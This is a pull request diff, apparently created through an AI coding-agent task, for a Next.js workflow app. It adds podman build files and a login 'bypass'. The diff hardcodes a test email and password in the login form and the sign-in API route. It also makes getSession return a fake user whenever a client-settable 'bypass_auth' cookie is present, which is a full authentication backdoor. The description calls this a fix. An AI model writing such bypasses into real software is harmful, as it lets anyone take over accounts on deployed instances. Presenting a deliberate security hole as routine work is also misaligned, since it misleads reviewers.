### PR TITLE
Fix bypass login path

### DIFF
--- a/apps/sim/app/(auth)/login/login-form.tsx
+++ b/apps/sim/app/(auth)/login/login-form.tsx
@@ -290,6 +290,25 @@ export default function LoginPage({
         document.cookie = 'has_logged_in_before=true; path=/; max-age=31536000; SameSite=Lax' // 1 year expiry
       }
     } catch (err: any) {
+      // Bypass login for test credentials -- REMOVE FOR PRODUCTION
+      if (email === 'yourmom@yahoo.com' && password === 'Carraja!2170!!') {
+        console.warn('Bypass login used')
+        try {
+          await fetch('/api/log/client-error', {
+            method: 'POST',
+            headers: { 'Content-Type': 'application/json' },
+            body: JSON.stringify({ context: 'bypass-login' }),
+          })
+        } catch (_err) {
+          console.error('Failed to log bypass login', _err)
+        }
+        if (typeof window !== 'undefined') {
+          document.cookie = 'bypass_auth=1; path=/; max-age=86400; SameSite=Lax'
+          localStorage.setItem('has_logged_in_before', 'true')
+        }
+        router.push('/workspace')
+        return
+      }
       // Handle only the special verification case that requires a redirect
       if (err.message?.includes('not verified') || err.code?.includes('EMAIL_NOT_VERIFIED')) {
         try {

--- a/apps/sim/app/api/auth/[...all]/route.ts
+++ b/apps/sim/app/api/auth/[...all]/route.ts
@@ -1,6 +1,33 @@
 import { toNextJsHandler } from 'better-auth/next-js'
+import { cookies } from 'next/headers'
 import { auth } from '@/lib/auth'
+import { createLogger } from '@/lib/logs/console-logger'
 
 export const dynamic = 'force-dynamic'
 
-export const { GET, POST } = toNextJsHandler(auth.handler)
+const handler = toNextJsHandler(auth.handler)
+
+const logger = createLogger('AuthAPI')
+
+export const GET = handler.GET
+
+export async function POST(request: Request) {
+  const url = new URL(request.url)
+  if (url.pathname.endsWith('/sign-in/email')) {
+    const payload = await request
+      .clone()
+      .json()
+      .catch(() => null)
+    // BYPASS BLOCK -- REMOVE BEFORE PRODUCTION
+    if (payload?.email === 'yourmom@yahoo.com' && payload?.password === 'Carraja!2170!!') {
+      cookies().set('bypass_auth', '1', { maxAge: 86400, path: '/' })
+      logger.warn('Bypass login used')
+      return new Response(JSON.stringify({}), {
+        status: 200,
+        headers: { 'Content-Type': 'application/json' },
+      })
+    }
+  }
+
+  return handler.POST(request)
+}

--- a/apps/sim/app/api/log/client-error/route.ts
+++ b/apps/sim/app/api/log/client-error/route.ts
@@ -1,0 +1,17 @@
+import { type NextRequest, NextResponse } from 'next/server'
+import { createLogger } from '@/lib/logs/console-logger'
+
+export const dynamic = 'force-dynamic'
+
+const logger = createLogger('ClientErrorLogger')
+
+export async function POST(request: NextRequest) {
+  try {
+    const data = await request.json()
+    logger.error('Client reported signup error', data)
+    return NextResponse.json({ ok: true })
+  } catch (error) {
+    logger.error('Failed to log client error', { error })
+    return NextResponse.json({ ok: false }, { status: 500 })
+  }
+}

--- a/apps/sim/lib/auth.ts
+++ b/apps/sim/lib/auth.ts
@@ -10,7 +10,7 @@ import {
   organization,
 } from 'better-auth/plugins'
 import { and, eq } from 'drizzle-orm'
-import { headers } from 'next/headers'
+import { cookies, headers } from 'next/headers'
 import { Resend } from 'resend'
 import Stripe from 'stripe'
 import {
@@ -1447,6 +1447,18 @@ export const auth = betterAuth({
 
 // Server-side auth helpers
 export async function getSession() {
+  const cookieStore = cookies()
+  // Temporary bypass for testing -- REMOVE FOR PRODUCTION
+  if (cookieStore.get('bypass_auth')?.value === '1') {
+    logger.warn('Bypass login session active')
+    return {
+      user: {
+        id: 'bypass-user',
+        email: 'yourmom@yahoo.com',
+        name: 'Bypass User',
+      },
+    } as any
+  }
   return await auth.api.getSession({
     headers: await headers(),
   })

--- a/podman/migrations/.env
+++ b/podman/migrations/.env
@@ -1,0 +1,1 @@
+DATABASE_URL=postgresql://sim_user:sim_password@pgvector:5432/simstudio

--- a/podman/migrations/Dockerfile
+++ b/podman/migrations/Dockerfile
@@ -1,0 +1,15 @@
+FROM oven/bun:alpine
+RUN apk add --no-cache libc6-compat
+WORKDIR /app
+COPY package.json bun.lock turbo.json ./
+RUN mkdir -p apps/sim
+COPY apps/sim/package.json ./apps/sim/package.json
+COPY apps/sim/drizzle.config.ts ./apps/sim/drizzle.config.ts
+COPY apps/sim/db ./apps/sim/db
+COPY apps/sim/lib/env.ts ./apps/sim/lib/env.ts
+RUN bun install --omit dev --ignore-scripts && \
+    bun install --omit dev --ignore-scripts drizzle-kit drizzle-orm postgres next-runtime-env zod @t3-oss/env-nextjs
+COPY podman/migrations/entrypoint.sh /app/entrypoint.sh
+RUN chmod +x /app/entrypoint.sh
+WORKDIR /app
+ENTRYPOINT ["/app/entrypoint.sh"]

--- a/podman/migrations/entrypoint.sh
+++ b/podman/migrations/entrypoint.sh
@@ -1,0 +1,11 @@
+#!/bin/sh
+set -e
+if [ -z "$DATABASE_URL" ]; then
+  echo "ERROR: DATABASE_URL is not set" >&2
+  exit 1
+fi
+cd /app/apps/sim
+if ! bun run db:migrate; then
+  echo "ERROR: Migration failed. Check migrations and environment variables." >&2
+  exit 1
+fi

--- a/podman/pgvector/.env
+++ b/podman/pgvector/.env
@@ -1,0 +1,3 @@
+POSTGRES_USER=sim_user
+POSTGRES_PASSWORD=sim_password
+POSTGRES_DB=simstudio

--- a/podman/pgvector/Dockerfile
+++ b/podman/pgvector/Dockerfile
@@ -1,0 +1,1 @@
+FROM pgvector/pgvector:pg17

--- a/podman/realtime/.env
+++ b/podman/realtime/.env
@@ -1,0 +1,4 @@
+DATABASE_URL=postgresql://sim_user:sim_password@pgvector:5432/simstudio
+NEXT_PUBLIC_APP_URL=http://simstudio:3000
+BETTER_AUTH_URL=http://simstudio:3000
+BETTER_AUTH_SECRET=changemebetterauthsecret

--- a/podman/realtime/Dockerfile
+++ b/podman/realtime/Dockerfile
@@ -1,0 +1,11 @@
+FROM oven/bun:alpine
+RUN apk add --no-cache libc6-compat
+WORKDIR /app
+COPY package.json bun.lock ./
+RUN mkdir -p apps
+COPY apps/sim/package.json ./apps/sim/package.json
+RUN bun install --omit dev --ignore-scripts
+COPY apps/sim ./apps/sim
+ENV NODE_ENV=production PORT=3002 SOCKET_PORT=3002 HOSTNAME=0.0.0.0
+EXPOSE 3002
+CMD ["bun","apps/sim/socket-server/index.ts"]

--- a/podman/simstudio/.env
+++ b/podman/simstudio/.env
@@ -1,0 +1,14 @@
+DATABASE_URL=postgresql://sim_user:sim_password@pgvector:5432/simstudio
+BETTER_AUTH_SECRET=changemebetterauthsecret
+BETTER_AUTH_URL=http://localhost:3000
+NEXT_PUBLIC_APP_URL=http://localhost:3000
+ENCRYPTION_KEY=changemeencryptionkey
+FREESTYLE_API_KEY=changeme
+GOOGLE_CLIENT_ID=changeme
+GOOGLE_CLIENT_SECRET=changeme
+GITHUB_CLIENT_ID=changeme
+GITHUB_CLIENT_SECRET=changeme
+RESEND_API_KEY=changeme
+OLLAMA_URL=http://localhost:11434
+SOCKET_SERVER_URL=http://realtime:3002
+NEXT_PUBLIC_SOCKET_URL=http://realtime:3002

--- a/podman/simstudio/Dockerfile
+++ b/podman/simstudio/Dockerfile
@@ -1,0 +1,31 @@
+FROM oven/bun:alpine AS deps
+RUN apk add --no-cache libc6-compat
+WORKDIR /app
+RUN bun install -g turbo
+COPY package.json bun.lock ./
+RUN mkdir -p apps
+COPY apps/sim/package.json ./apps/sim/package.json
+RUN bun install --omit dev --ignore-scripts
+
+FROM oven/bun:alpine AS build
+WORKDIR /app
+COPY --from=deps /app/node_modules ./node_modules
+COPY . .
+RUN bun install --omit dev --ignore-scripts
+WORKDIR /app/apps/sim
+RUN bun install sharp
+ENV NEXT_TELEMETRY_DISABLED=1 \
+    VERCEL_TELEMETRY_DISABLED=1 \
+    DOCKER_BUILD=1
+WORKDIR /app
+RUN bun run build
+
+FROM oven/bun:alpine
+WORKDIR /app
+ENV NODE_ENV=production
+COPY --from=build /app/apps/sim/public ./apps/sim/public
+COPY --from=build /app/apps/sim/.next/standalone ./
+COPY --from=build /app/apps/sim/.next/static ./apps/sim/.next/static
+EXPOSE 3000
+ENV PORT=3000 HOSTNAME=0.0.0.0
+CMD ["bun","apps/sim/server.js"]


### PR DESCRIPTION
## Summary
- intercept email sign-in endpoint to allow the test credential
- log when the bypass is used and set the bypass cookie
- fix lint in auth API route

## Testing
- `bun run lint`
- `bun run test`


------
https://chatgpt.com/codex/tasks/task_e_68843891ab38832f86c9e162a60ffefd